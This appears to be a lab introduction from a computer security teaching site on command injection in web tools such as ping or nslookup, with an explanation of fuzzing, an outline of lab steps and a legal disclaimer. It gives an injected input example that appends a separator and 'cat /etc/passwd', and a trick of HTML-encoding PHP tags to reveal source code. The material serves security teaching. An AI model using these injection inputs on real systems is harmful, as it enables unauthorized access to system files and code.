Command Injection occurs when an attacker is able to run operating
system commands or serverside scripts from the web application. This
vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage. You can
test for the vulnerability by using a technique called fuzzing, where a ";"
or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg.,
www.cnn.com) followed by a command (eg., cat /etc/passwd).

What is Fuzzing?

Fuzz testing or fuzzing is a software testing technique that involves
providing invalid, unexpected, or random data to the inputs of a computer
program. The program is then monitored for exceptions such as crashes, or
failing built-in code assertions or for finding potential memory leaks.
Fuzzing is commonly used to test for security problems in software or
computer systems.

Note:
This is not absolutely necessary, but if you are a computer security
student or professional, you should have a BackTrack VM.

Lab
Notes

In this lab we will do the following:

Exploit a command injection/execution
fuzzing vulnerability.

Operating System Reconnaissance

Application home directory
Reconnaissance

Database Reconnaissance

Encoding PHP Script to view contents

Remotely connecting to database

Legal Disclaimer

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.

I guess I could have showed you this first,
but good things come to those that wait.

It is possible to display the contents of
the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.
These tags tell apache to execute a php script. To get around this
problem and just display the text of the program, we change "<" to
"&#60;" and ">" to "&#62;".